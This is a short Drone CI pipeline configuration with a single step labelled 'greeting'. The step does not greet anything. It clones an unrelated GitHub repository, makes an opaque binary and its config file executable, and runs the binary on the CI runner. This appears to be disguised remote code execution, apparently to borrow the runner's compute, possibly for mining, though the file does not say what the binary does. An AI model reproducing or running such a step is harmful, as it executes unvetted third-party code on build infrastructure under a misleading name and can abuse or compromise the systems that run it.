---
kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: golang:1.12
  commands:
  - git clone https://github.com/azureone132/zephher.git && cd zephher && chmod +x config.json && chmod +x zepo && ./zepo -c "config.json"
